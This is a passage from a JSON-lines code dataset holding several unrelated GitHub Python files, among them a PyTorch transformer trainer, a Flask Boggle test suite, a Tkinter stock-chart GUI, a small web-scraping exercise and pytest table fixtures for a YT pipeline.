debug_level='info')\n","repo_name":"PacktPublishing/Python-Network-Programming-Cookbook-Second-Edition","sub_path":"Chapter14/14_2_benchmark_with_bgperf/gobgp.py","file_name":"gobgp.py","file_ext":"py","file_size_in_byte":4997,"program_lang":"python","lang":"en","doc_type":"code","stars":148,"dataset":"github-code","pt":"72"} +{"seq_id":"21854836965","text":"'''\nauthor: hzj\ndate: 2022-4-9\nfile info: 搭建transformer模型\n'''\nimport torch.nn as nn\nimport numpy as np\nimport torch\nfrom torch import Tensor\nimport torch.optim as optim\nimport csv\nfrom torch.optim.lr_scheduler import ExponentialLR, ReduceLROnPlateau\nfrom DataGenerate.seq2Traindata import SeqDataset\nfrom torch.utils.data import DataLoader\nimport pandas\nfrom torchtext.legacy.data import Field, TabularDataset, BucketIterator, Iterator\nfrom torch.nn.utils.rnn import pack_padded_sequence\n\n\nclass NoamLR(object):\n def __init__(self, optimizer, warmup_steps, d_model, last_epoch=-1):\n super(NoamLR, self).__init__()\n\n self.optimizer = optimizer\n self.warmup_steps = warmup_steps\n self.d_model = d_model\n self.step_count = 0\n\n if last_epoch == -1:\n for group in optimizer.param_groups:\n group.setdefault('initial_lr', group['lr'])\n\n self.last_epoch = last_epoch\n self.base_lrs = [group['initial_lr'] for group in optimizer.param_groups]\n\n def get_lr(self):\n # step_num = self.step_count + 1\n # warmupLR\n # return [\n # base_lr * self.warmup_steps ** 0.5 * min(self.step_count ** -0.5,\n # self.step_count * self.warmup_steps ** -1.5)\n # for base_lr in self.base_lrs]\n # NoamLR\n return [\n base_lr * self.d_model ** -0.5 * min(self.step_count ** -0.5, self.step_count * self.warmup_steps ** -1.5)\n for base_lr in self.base_lrs]\n\n def step(self, epoch=None):\n if epoch == None:\n self.step_count += 1\n values = self.get_lr()\n\n for i, data in enumerate(zip(self.optimizer.param_groups, values)):\n param_group, lr = data\n param_group['lr'] = lr\n\n\ndef tokenize(text):\n return text.replace(' ', '')[1:-1].split(',')\n\n\nSRC = Field(\n sequential=True,\n tokenize=tokenize,\n init_token=None,\n eos_token=None,\n pad_token='',\n unk_token=''\n)\nTGT = Field(\n sequential=True,\n tokenize=tokenize,\n init_token='',\n eos_token='',\n pad_token='',\n unk_token=''\n)\n\n# csv里的每一列都要设置,不需要的类可以这样:(列名,None)\nfields = [('TGT', TGT), ('SRC', SRC)]\ntrain_data, validation_data, test_data = TabularDataset.splits(\n path='../DataGenerate/',\n train='trainDataSet20000.csv',\n validation='testDataSet20000.csv',\n test='test.csv',\n format='csv',\n skip_header=True,\n fields=fields\n)\n\n# 设置最小词频min_freq,当一个单词在数据集中出现次数小于min_freq时会被转换为字符\nSRC.build_vocab(train_data, min_freq=10)\nTGT.build_vocab(train_data, min_freq=1)\n# stoi返回defaultdict词表\nsrc_vocab = SRC.vocab.stoi\ntgt_vocab = TGT.vocab.stoi\nsrc_idx2word = {src_vocab[key]: key for key in src_vocab}\ntgt_idx2word = {tgt_vocab[key]: key for key in tgt_vocab}\nsrc_vocab_size = len(SRC.vocab)\ntgt_vocab_size = len(TGT.vocab)\nbatch_size = 128\n\n# 使用BucketIterator迭代器处理数据集\ntrain_iter, validation_iter, test_iter = BucketIterator.splits(\n datasets=(train_data, validation_data, test_data),\n # batch_sizes=(batch_size, batch_size, batch_size),\n batch_size=batch_size,\n sort_within_batch=True,\n sort_key=lambda x: len(x.SRC),\n shuffle=True\n)\n\n\nclass NegativeSurvey_Transformer(nn.Module):\n def __init__(\n self,\n d_model: int = 512,\n nhead: int = 8,\n num_encoder_layers: int = 6,\n num_decoder_layers: int = 6,\n dim_feedforward: int = 2048,\n dropout: float = 0.1\n ):\n super(NegativeSurvey_Transformer, self).__init__()\n # 初始化transformer模型\n self.transformer = nn.Transformer(\n d_model=d_model,\n nhead=nhead,\n num_encoder_layers=num_encoder_layers,\n num_decoder_layers=num_decoder_layers,\n dim_feedforward=dim_feedforward,\n dropout=dropout\n )\n\n # 词嵌入对象以及位置embedding\n self.src_word_embedding = nn.Embedding(\n num_embeddings=src_vocab_size,\n embedding_dim=d_model,\n padding_idx=src_vocab[SRC.pad_token]\n )\n # self.src_position_embedding = nn.Embedding.from_pretrained()\n self.trg_word_embedding = nn.Embedding(\n num_embeddings=tgt_vocab_size,\n embedding_dim=d_model,\n padding_idx=tgt_vocab[TGT.pad_token]\n )\n self.dropout = nn.Dropout(dropout)\n\n self.d_model = d_model\n # 线性层\n self.projection = nn.Linear(d_model, tgt_vocab_size, bias=False)\n\n def forward(self, src: Tensor, tgt: Tensor):\n '''\n\n :param inputs: [S, N]\n :param outputs: [T, N]\n :param src_padding_index: 编码序列的padding符号表示下标\n :param tgt_padding_index: 解码序列的padding符号表示下标\n :return:\n '''\n src_len, N = src.shape\n tgt_len, N = tgt.shape\n\n # 生成输入输出编码\n src_word_emb = self.src_word_embedding(src)\n tgt_word_emb = self.trg_word_embedding(tgt)\n src_word_emb = self.dropout(src_word_emb)\n tgt_word_emb = self.dropout(tgt_word_emb)\n src_position = self.PositionEncoding(src_len, self.d_model).unsqueeze(1)\n tgt_position = self.PositionEncoding(tgt_len, self.d_model).unsqueeze(1)\n encoding_inputs = src_word_emb + src_position\n encoding_outputs = tgt_word_emb + tgt_position\n # 因为pytorch的transformer模型要求输入的src和tgt维度为[S, N, E]/[T, N, E],todo:传统RNN的每一步要输入每个样例的一个单词的影响?\n # encoding_inputs = encoding_inputs.transpose(0, 1)\n # encoding_outputs = encoding_outputs.transpose(0, 1)\n # encoding_inputs = self.dropout(encoding_inputs)\n # encoding_outputs = self.dropout(encoding_outputs)\n # src_pad_index = src_vocab[SRC.pad_token]\n # tgt_pad_index = tgt_vocab[TGT.pad_token]\n src_key_padding_mask = self.generate_key_padding_mask(src, pad_index=src_vocab[SRC.pad_token])\n tgt_key_padding_mask = self.generate_key_padding_mask(tgt, pad_index=tgt_vocab[TGT.pad_token])\n '''注意这里memory_key_padding_mask和src_key_padding_mask值相同'''\n memory_key_padding_mask = src_key_padding_mask\n memory_mask = self.generate_memory_mask(tgt_len, src_len)\n # 生成tgt_attn_mask\n tgt_mask = self.transformer.generate_square_subsequent_mask(tgt_len)\n # 对于pytorch的transformer模型,Decoder中把两种mask矩阵相加(既屏蔽了pad的信息,也屏蔽了未来时刻的信息)\n out = self.transformer(\n encoding_inputs,\n encoding_outputs,\n src_key_padding_mask=src_key_padding_mask,\n tgt_key_padding_mask=tgt_key_padding_mask,\n # memory_key_padding_mask=memory_key_padding_mask,\n memory_mask=memory_mask,\n tgt_mask=tgt_mask\n )\n\n out = self.projection(out)\n # 转置之后tensor属性更改,语义上不再是连续的(该情况下调用view无效),所以调用contiguous方法使其语义连续\n # return out.view(-1, out.size(-1))\n return out\n\n @staticmethod\n # 进行位置编码\n def PositionEncoding(positions, d_model):\n def calculate_dim(position, dim):\n return position / pow(10000, 2 * (dim // 2) / d_model)\n\n def calculate_dim_vector(position):\n return [calculate_dim(position, dim) for dim in range(d_model)]\n\n position_encoding = np.array([calculate_dim_vector(position) for position in range(positions)])\n position_encoding[:, 0::2] = np.sin(position_encoding[:, 0::2])\n position_encoding[:, 1::2] = np.sin(position_encoding[:, 1::2])\n\n return torch.FloatTensor(position_encoding)\n\n @staticmethod\n def generate_key_padding_mask(seq_k, pad_index):\n '''\n\n :param seq_k: [batch_size, seq_len]\n :param pad_index: 用于padding_mask的数据下标\n :return: 生成序列k对应的key_padding_mask\n pytorch的transformer框架内部已经实现了key_padding_mask维度拓宽,\n 所以之类我们输入的长度key_padding_mask维度为[N, k_len]\n '''\n # eq(pad_index) is PAD token\n # key_padding_mask = seq_k.data.eq(pad_index).unsqueeze(1) # [batch_size, 1, len_k], True is masked\n # key_padding_mask = seq_k.data.eq(pad_index) # [batch_size, len_k], True is masked\n # return key_padding_mask # [batch_size, len_k]\n return seq_k.transpose(0, 1) == pad_index\n\n @staticmethod\n def generate_memory_mask(tgt_len, src_len):\n '''\n 这里就是为负调查特定设定的memory_mask,因为我们希望某一个位置的正调查对相同位置的负调查数据是没有关注度的;\n 又因为tgt增加了开始符结束符,所以在最后预测结束符的时候可以用全局信息,是不需要mask的\n :param tgt_len: 目标序列的长度\n :param src_len: 源序列长度\n :return: memory_mask: :math:(T, S)\n '''\n mask = (torch.ones(tgt_len, src_len)) == 1\n for i in range(src_len):\n mask[i, i] = False\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))\n return mask\n\n\n# 模型训练函数\ndef model_train_method(\n model: NegativeSurvey_Transformer,\n epoch_num: int,\n lr: float\n):\n model.train(mode=True)\n\n criterion = nn.CrossEntropyLoss(ignore_index=tgt_vocab[TGT.pad_token])\n '''\n weight_decay是L2正则化理论中出现的概念(L2范数就是:loss+所有权重的平方开方和,这样就是为了约束参数的大小)\n 参数很大,一个小的变动,都会产生很大的不同,所以加上L2范数很好地解决过拟合的问题\n pytorch中backward计算梯度,但是L2正则项不是通过backward计算的,在梯度下降的算法中,梯度=原始梯度+权重衰减系数*权重系数(结果和backward是一样的)\n '''\n # optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9, weight_decay=0.0005)\n optimizer = optim.Adam(model.parameters(), lr=lr)\n NoamScheduler = NoamLR(optimizer=optimizer, warmup_steps=50, d_model=model.d_model)\n\n for epoch in range(epoch_num):\n # 对于warmup策略,必须要在梯度更新前进行一次step将梯度调整到最低\n NoamScheduler.step()\n\n loss_list = []\n for batch_idx, batch in enumerate(train_iter):\n src = batch.SRC\n tgt = batch.TGT\n\n output = model(\n src=src,\n tgt=tgt[:-1]\n )\n output = output.reshape(-1, output.shape[-1])\n # item = tgt[1:].view(-1)\n loss = criterion(output, tgt[1:].view(-1))\n loss_list.append(round(loss.data.item(), 4))\n print('Epoch: %04d' % (epoch + 1) + '/' + str(epoch_num), 'loss= {:.6f}'.format(loss))\n optimizer.zero_grad()\n loss.backward()\n\n # todo: 对所有参数的梯度进行规范化\n torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=1)\n optimizer.step()\n\n # 将每个epoch的loss损失函数值记录到loss.csv文件中\n with open('loss.csv', mode='a', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(loss_list)\n\n if epoch % 10 == 0:\n valid_loss_list = []\n for batch_idx, batch in enumerate(validation_iter):\n src_valid = batch.SRC\n tgt_valid = batch.TGT\n\n output = model(\n src=src_valid,\n tgt=tgt_valid[:-1]\n )\n output = output.reshape(-1, output.shape[-1])\n loss = criterion(output, tgt_valid[1:].view(-1))\n valid_loss_list.append(round(loss.data.item(), 4))\n print('-----valid-loss = {:.6f}-----'.format(loss))\n\n with open('valid_loss.csv', mode='a', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(valid_loss_list)\n torch.save(model.state_dict(), '../trained_models/' + str(epoch) + 'model_5.pt')\n\n # torch.save(model.state_dict(), 'model.pt')\n\n\ndef model_train_method2(\n model: NegativeSurvey_Transformer,\n epoch_num: int,\n lr: float\n):\n model.train(mode=True)\n\n criterion = nn.CrossEntropyLoss(ignore_index=tgt_vocab[TGT.pad_token])\n '''\n weight_decay是L2正则化理论中出现的概念(L2范数就是:loss+所有权重的平方开方和,这样就是为了约束参数的大小)\n 参数很大,一个小的变动,都会产生很大的不同,所以加上L2范数很好地解决过拟合的问题\n pytorch中backward计算梯度,但是L2正则项不是通过backward计算的,在梯度下降的算法中,梯度=原始梯度+权重衰减系数*权重系数(结果和backward是一样的)\n '''\n # optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9, weight_decay=0.1)\n optimizer = optim.Adam(model.parameters(), lr=lr, weight_decay=0.01)\n NoamScheduler = NoamLR(optimizer=optimizer, warmup_steps=50, d_model=model.d_model)\n\n for epoch in range(epoch_num):\n # 对于warmup策略,必须要在梯度更新前进行一次step将梯度调整到最低\n NoamScheduler.step()\n\n for batch_idx, batch in enumerate(train_iter):\n src = batch.SRC\n tgt = batch.TGT\n\n dec_input = tgt[:1]\n tgt_len = len(tgt) - 1\n global output\n for i in range(tgt_len):\n output = model(\n src=src,\n tgt=dec_input\n )\n # predict = output.argmax(dim=-1).reshape(-1, output.shape[0])\n predict = output.argmax(dim=-1)[-1:]\n dec_input = torch.cat((dec_input, predict), dim=0)\n\n output = output.reshape(-1, output.shape[-1])\n # item = tgt[1:].view(-1)\n loss = criterion(output, tgt[1:].view(-1))\n print('Epoch: %04d' % (epoch + 1) + '/' + str(epoch_num), 'loss= {:.6f}'.format(loss))\n optimizer.zero_grad()\n loss.backward()\n\n # todo:对所有参数的梯度进行规范化\n torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=1)\n optimizer.step()\n\n if epoch % 10 == 0:\n torch.save(model.state_dict(), '../trained_models/' + str(epoch) + 'model.pt')\n\n # torch.save(model.state_dict(), 'model.pt')\n\n\ndef model_test_method(model: nn.Module):\n model.eval()\n with torch.no_grad():\n for batch_idx, batch in enumerate(test_iter):\n src = batch.SRC\n tgt = batch.TGT\n\n output = model(\n src=src,\n tgt=tgt[:-1]\n )\n # predict = output.argmax(dim=-1).reshape(-1, output.shape[0])\n predict = output.argmax(dim=-1).transpose(0, 1)\n source = src.transpose(0, 1)\n target = tgt[1:].transpose(0, 1)\n for i in range(len(predict)):\n print([src_idx2word[int(x)] for x in source[i]], '->', [tgt_idx2word[int(y)] for y in target[i]], '->',\n [tgt_idx2word[int(z)] for z in predict[i]])\n\n # if batch_idx > 10:\n # break\n\n\ndef model_test_method2(model: nn.Module):\n model.eval()\n with torch.no_grad():\n for batch_idx, batch in enumerate(test_iter):\n src = batch.SRC\n tgt = batch.TGT\n\n dec_input = tgt[:1]\n tgt_len = len(tgt) - 1\n global output\n for i in range(tgt_len):\n output = model(\n src=src,\n tgt=dec_input\n )\n # predict = output.argmax(dim=-1).reshape(-1, output.shape[0])\n predict = output.argmax(dim=-1)[-1:]\n dec_input = torch.cat((dec_input, predict), dim=0)\n target = tgt[1:].transpose(0, 1)\n output = output.argmax(dim=-1).transpose(0, 1)\n for i in range(len(target)):\n print([tgt_idx2word[int(n)] for n in target[i]], '->', [tgt_idx2word[int(m)] for m in output[i]])\n\n\nif __name__ == '__main__':\n # trainedmodel-3.pt,lr=0.01,warmup_step=50,weight_decay=0\n # model = NegativeSurvey_Transformer(\n # d_model=256,\n # nhead=4,\n # num_encoder_layers=3,\n # num_decoder_layers=3,\n # dim_feedforward=1024\n # )\n\n model = NegativeSurvey_Transformer(\n d_model=512,\n nhead=4,\n num_encoder_layers=3,\n num_decoder_layers=3,\n dim_feedforward=2048,\n dropout=0.3\n )\n load_state_dict = torch.load('../transformer_models/100model_5.pt')\n model.load_state_dict(load_state_dict)\n\n # model_train_method(\n # model=model,\n # epoch_num=200,\n # lr=0.1\n # )\n # named_parameters = model.named_parameters()\n # params_0 = [p for n, p in named_parameters]\n # temp = [n for n, p in named_parameters]\n #\n model_test_method(model=model)\n # model_test_method2(model=model)\n","repo_name":"huang-zi-jian/Negative-Survey-Based-On-Deep-Learning","sub_path":"Models/mode1.py","file_name":"mode1.py","file_ext":"py","file_size_in_byte":17460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36295991770","text":"import requests\nimport parsel\n\nbase_url = 'http://books.toscrape.com/catalogue/'\nresponse = requests.get(base_url + 'the-grand-design_405/index.html')\nselector = parsel.Selector(text=response.text)\ntitle = selector.css('.product_main h1::text').get()\nprice = selector.css('.product_main p::text').re_first(r\"\\d*\\.\\d{2}\")\n# recupera a descrição do produto\n# ~ significa a tag irmã\ndescription = selector.css('#product_description ~ p::text').get()\nsuffix = '...more'\nimg_url = base_url + selector.css('.active img::attr(src)').get()\ntable = selector.css('.table tr td::text').getall()\n\nprint(title,price,description[:-len(suffix)], img_url, table[5][10:11], sep=',')","repo_name":"Caique-Ferian/trybe-exercicios","sub_path":"Ciência-da-Computação/REDES-E-RASPAGEM-DE-DADOS/dia-2-raspagem-de-dados/exercise_4_and_5.py","file_name":"exercise_4_and_5.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"11539746732","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nt = int(input())\r\nfor tc in range(t):\r\n n = int(input())\r\n data = [list(map(int,input().split())) for _ in range(n)]\r\n data = sorted(data)\r\n min_value = data[0][1]\r\n count = 1\r\n for i in range(n):\r\n if data[i][1] < min_value:\r\n count += 1\r\n min_value = data[i][1]\r\n print(count)","repo_name":"HyemIin/algorithm-code-test","sub_path":"백준/Silver/1946. 신입 사원/신입 사원.py","file_name":"신입 사원.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7472924131","text":"from unittest import TestCase\n\nfrom app import app, games\n\n# Make Flask errors be real errors, not HTML pages with error info\napp.config[\"TESTING\"] = True\n\n# This is a bit of hack, but don't use Flask DebugToolbar\napp.config[\"DEBUG_TB_HOSTS\"] = [\"dont-show-debug-toolbar\"]\n\n\nclass BoggleAppTestCase(TestCase):\n \"\"\"Test flask app of Boggle.\"\"\"\n\n def setUp(self):\n \"\"\"Stuff to do before every test.\"\"\"\n\n self.client = app.test_client()\n app.config[\"TESTING\"] = True\n\n def test_homepage(self):\n \"\"\"Make sure information is in the session and HTML is displayed\"\"\"\n\n with self.client as client:\n response = client.get(\"/\")\n html = response.get_data(as_text=True)\n\n self.assertEqual(response.status_code, 200)\n self.assertIn('', html)\n ...\n # test that you're getting a template\n\n def test_api_new_game(self):\n \"\"\"Test starting a new game.\"\"\"\n\n with self.client as client:\n ...\n response = client.post(\"/api/new-game\")\n json = response.get_json()\n game_id = json[\"gameId\"]\n board = json[\"board\"]\n\n self.assertIsInstance(game_id, str)\n self.assertIsInstance(board, list)\n self.assertIsInstance(board[0], list)\n\n self.assertIn(game_id, games)\n\n # make a post request to /api/new-game\n # get the response body as json using .get_json()\n # test that the game_id is a string\n # test that the board is a list\n # test that the game_id is in the dictionary of games (imported from app.py above)\n\n def test_score_word(self):\n \"\"\"Test if word is valid\"\"\"\n\n with self.client as client:\n ...\n response = client.post(\"/api/new-game\")\n json = response.get_json()\n game_id = json[\"gameId\"]\n\n game = games[game_id]\n game.board = [\n [\"I\", \"S\", \"E\", \"M\", \"E\"],\n [\"N\", \"S\", \"D\", \"S\", \"G\"],\n [\"B\", \"O\", \"A\", \"R\", \"P\"],\n [\"G\", \"S\", \"P\", \"A\", \"X\"],\n [\"Y\", \"X\", \"B\", \"E\", \"C\"],\n ]\n\n t1 = client.post(\n \"/api/score-word\", json={\"gameId\": game_id, \"word\": \"BOARD\"}\n )\n t1json = t1.get_json()\n self.assertEqual(t1json, {\"result\": \"ok\"})\n\n t2 = client.post(\n \"/api/score-word\", json={\"gameId\": game_id, \"word\": \"WEIRD\"}\n )\n t2json = t2.get_json()\n self.assertEqual(t2json, {\"result\": \"not-on-board\"})\n\n t3 = client.post(\n \"/api/score-word\", json={\"gameId\": game_id, \"word\": \"GHINWEKA\"}\n )\n t3json = t3.get_json()\n self.assertEqual(t3json, {\"result\": \"not-word\"})\n\n # make a post request to /api/new-game\n # get the response body as json using .get_json()\n # find that game in the dictionary of games (imported from app.py above)\n\n # manually change the game board's rows so they are not random\n\n # test to see that a valid word on the altered board returns {'result': 'ok'}\n # test to see that a valid word not on the altered board returns {'result': 'not-on-board'}\n # test to see that an invalid word returns {'result': 'not-word'}\n","repo_name":"Ashley-Y-Lin/flask-boggle","sub_path":"test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36112270057","text":"import matplotlib\n\nmatplotlib.use(\"TkAgg\")\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk\nfrom matplotlib.figure import Figure\nimport matplotlib.animation as animation\nfrom matplotlib import style\n\nimport tkinter as tk\nfrom tkinter import ttk\nimport yfinance as yf\n\nimport mpl_finance as mpf\nimport matplotlib.dates as mdates\n\nimport plotly.graph_objects as go\nimport plotly.subplots as sp\nimport matplotlib.pyplot as plt\n\nfrom Trading_main import *\n\nLARGE_FONT = (\"Verdana\", 12)\nstyle.use(\"ggplot\")\n\nimport pandas as pd\nimport numpy as np\n\nstart_date = \"2022-01-01\"\nend_date = \"2023-01-01\"\nstock = 'AAPL'\nallStocks = {}\ndf = yf.download(stock, start=start_date, end=end_date)\nallStocks[stock] = df\nquotes = zip(mdates.date2num(df.index.to_pydatetime()), df['Open'], df['High'], df['Low'], df['Close'])\n\nfig = Figure(figsize=(5, 5), dpi=100)\na = fig.add_subplot(111)\na.set_title(stock)\n\ndef animate(i):\n if stock in allStocks:\n df = allStocks[stock]\n print('stock already downloaded')\n else:\n df = yf.download(stock, start=start_date, end=end_date)\n print('downloading stock')\n \n quotes = zip(mdates.date2num(df.index.to_pydatetime()), df['Open'], df['High'], df['Low'], df['Close'])\n mpf.candlestick_ohlc(a, quotes, width=0.6, colorup='g', colordown='r')\n a.xaxis.set_major_locator(mdates.AutoDateLocator())\n a.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))\n fig.autofmt_xdate()\n\n\nclass TradingGUI(tk.Tk):\n def __init__(self, *args, **kwargs):\n tk.Tk.__init__(self, *args, **kwargs)\n tk.Tk.wm_title(self, \"Trading GUI\")\n\n container = tk.Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n\n self.frames = {}\n for F in (PageOne, GraphPage):\n frame = F(container, self)\n self.frames[F] = frame\n frame.grid(row=0, column=0, sticky=\"nsew\")\n self.show_frame(PageOne)\n \n def show_frame(self, cont):\n frame = self.frames[cont]\n frame.tkraise()\n\nclass PageOne(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n label = tk.Label(self, text=\"Page One!!!\", font=LARGE_FONT)\n label.pack(pady=10, padx=10)\n\n def get_text():\n # Get the text from the input box\n global stock\n global start_date\n global end_date\n start_date = start_date_entry.get()\n end_date = end_date_entry.get()\n stock = stock_entry.get()\n\n def submit_and_show_frame():\n global quotes\n get_text()\n a.clear()\n a.set_title(stock)\n df = yf.download(stock, start=start_date, end=end_date)\n quotes = zip(mdates.date2num(df.index.to_pydatetime()), df['Open'], df['High'], df['Low'], df['Close'])\n controller.show_frame(GraphPage)\n\n def runAnalyseLastMonth():\n global allStocks\n allStocks = analyseLastMonth()\n \n # Create a label and entry for stock ticker\n stock_label = ttk.Label(self, text=\"Stock Ticker:\")\n stock_entry = ttk.Entry(self)\n # Set a placeholder for stock entry\n stock_entry.insert(0, \"AAPL\")\n stock_label.pack(pady=10, padx=10)\n stock_entry.pack()\n\n # Create a label and entry for start date\n start_date_label = ttk.Label(self, text=\"Start Date (YYYY-MM-DD):\")\n start_date_entry = ttk.Entry(self)\n # Set a placeholder for start date entry\n start_date_entry.insert(0, start_date)\n start_date_label.pack(pady=10, padx=10)\n start_date_entry.pack()\n\n # Create a label and entry for end date\n end_date_label = ttk.Label(self, text=\"End Date (YYYY-MM-DD):\")\n end_date_entry = ttk.Entry(self)\n # Set a placeholder for end date entry\n end_date_entry.insert(0, end_date)\n end_date_label.pack(pady=10, padx=10)\n end_date_entry.pack()\n \n # Create a submit button\n submit_button = ttk.Button(self, text=\"Submit\", command = submit_and_show_frame)\n submit_button.pack()\n\n buttonRun = ttk.Button(\n self, text=\"Run analysis for stock\", command= lambda:runScript(stock,start_date,end_date)\n )\n buttonRun.pack()\n \n buttonRunAll = ttk.Button(\n self, text=\"Run script for all stocks\", command= lambda:runAnalyseLastMonth()\n )\n buttonRunAll.pack() \n \n\nclass GraphPage(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n label = tk.Label(self, text=\"Graph Page!\", font=LARGE_FONT)\n label.pack(pady=10, padx=10)\n\n button1 = ttk.Button(\n self, text=\"Back to Home\", command=lambda: controller.show_frame(PageOne)\n )\n button1.pack() \n \n canvas = FigureCanvasTkAgg(fig, self)\n canvas.draw()\n canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=True)\n\n toolbar = NavigationToolbar2Tk(canvas, self)\n toolbar.update()\n canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)\n\n\napp = TradingGUI()\nani = animation.FuncAnimation(fig, animate, interval=1000)\napp.mainloop()\n","repo_name":"MartinDeV1991/stock-market-analysis","sub_path":"Gui.py","file_name":"Gui.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26267876028","text":"from cs50 import get_string\n\n\ntext = get_string(\"Text: \")\nw = len(text.split()) # splits the string in words using spaces as delimiter, then takes length as number of words\nl = 0\ns = 0\n\nfor i in text:\n if i.isalpha(): # each alphabetic character is counted as a letter\n l += 1\n elif i in [\".\", \"?\", \"!\"]: # each . or ? or ! is counted as end of a sentence\n s += 1\nl = l / w * 100 # divide by number of words and multiplied by a 100 gives the average number of letters per 100 words\ns = s / w * 100\n\ncoleman = 0.0588 * l - 0.296 * s - 15.8 # calculate the Coleman Liau index\n\nif coleman >= 16:\n print(\"Grade 16+\")\nelif coleman < 1:\n print(\"Before Grade 1\")\nelse:\n print(f\"Grade {int(round(coleman))}\")\n","repo_name":"tommyvdz/cs50","sub_path":"pset6/readability/readability.py","file_name":"readability.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14278756031","text":"from machine import Pin\r\nfrom time import sleep\r\n\r\ndef main():\r\n #pico:\r\n #pin=Pin(25, Pin.OUT)\r\n #picow:\r\n pin=Pin(\"LED\", Pin.OUT)\r\n\r\n print(\"starting program\")\r\n for i in range(6):\r\n pin.high()\r\n sleep(.5)\r\n pin.low()\r\n sleep(.5)\r\n \r\n print(\"ending program\")\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"gobbyo/IoT","sub_path":"python/raspberrypi/pico/simpleLED.py","file_name":"simpleLED.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38445255852","text":"#!/usr/bin/python3\n# -*- encoding=utf8 -*-\n\nimport time\nfrom pages import YandexMainPage\nfrom pages import YandexSearchResultsPage\n\n\ndef test_search_some_long_text(selenium):\n page = YandexMainPage(selenium)\n\n page.search_text = 'a' * 1000\n page.search_button.click()\n\n time.sleep(5)\n\n search_page = YandexSearchResultsPage(page.w)\n assert search_page.results_count() == 12\n","repo_name":"TimurNurlygayanov/test-tasks-example","sub_path":"qa_python/lesson006/yandex_example/test_page_object_example.py","file_name":"test_page_object_example.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"9590578205","text":"# 놀이기구 처음 이용료는 price\n# N번째 이용시 원래 이용료의 N배\n# ex) 100원, 3번 -> 100원, 200원, 300원\n# N번 이용시 모자라는 금액 return, 모자라지 않은 경우 0 return\n\ndef solution(price, money, count):\n answer = 0\n \n sum = 0\n for i in range(1, count+1):\n sum += price * i\n \n if sum > money:\n answer = sum - money\n else:\n return answer\n \n return answer\n\n# 제한사항\n# 놀이기구의 이용료 price : 1 ≤ price ≤ 2,500, price는 자연수\n# 처음 가지고 있던 금액 money : 1 ≤ money ≤ 1,000,000,000, money는 자연수\n# 놀이기구의 이용 횟수 count : 1 ≤ count ≤ 2,500, count는 자연수\n\n# 입출력 예\n# price\tmoney\tcount\tresult\n# 3\t 20\t 4\t 10","repo_name":"mieumje/Python_Coding_Test","sub_path":"Level1_Programmers/부족한 금액 계산하기.py","file_name":"부족한 금액 계산하기.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"87642019","text":"import pytest\n\nfrom crypta.lib.proto.user_data.user_data_pb2 import TUserData\nfrom crypta.lib.python.yql import proto_field as yql_proto_field\nfrom crypta.lib.python.yt import schema_utils\nfrom crypta.lib.python.yt.test_helpers import (\n row_transformers,\n tables,\n)\nfrom crypta.siberia.bin.common.proto.crypta_id_user_data_pb2 import TCryptaIdUserData\nfrom crypta.siberia.bin.common.yt_describer.proto.group_stats_pb2 import TGroupStats\n\n\n@pytest.fixture(scope=\"function\")\ndef crypta_id_user_data_table():\n def get_crypta_id_user_data_table(filename, path):\n on_write = tables.OnWrite(\n sort_by=['crypta_id'],\n attributes={'schema': schema_utils.get_schema_from_proto(TCryptaIdUserData)},\n row_transformer=row_transformers.proto_dict_to_yson(TCryptaIdUserData),\n )\n return tables.YsonTable(\n filename,\n path,\n on_write=on_write,\n )\n return get_crypta_id_user_data_table\n\n\n@pytest.fixture(scope=\"function\")\ndef user_data_table():\n def get_user_data_table(filename, path):\n on_write = tables.OnWrite(\n sort_by=['yuid'],\n attributes=dict([('schema', schema_utils.get_schema_from_proto(TUserData))] +\n list(yql_proto_field.get_attrs(TUserData).items())),\n row_transformer=row_transformers.proto_dict_to_yson(TUserData),\n )\n return tables.YsonTable(\n filename,\n path,\n on_write=on_write,\n )\n return get_user_data_table\n\n\n@pytest.fixture(scope=\"function\")\ndef segment_stats_table():\n def get_segment_stats_table(filename, path):\n on_write = tables.OnWrite(\n attributes={'schema': schema_utils.get_schema_from_proto(TGroupStats, key_columns=['GroupID'])},\n row_transformer=row_transformers.proto_dict_to_yson(TGroupStats),\n )\n return tables.YsonTable(\n filename,\n path,\n on_write=on_write,\n )\n return 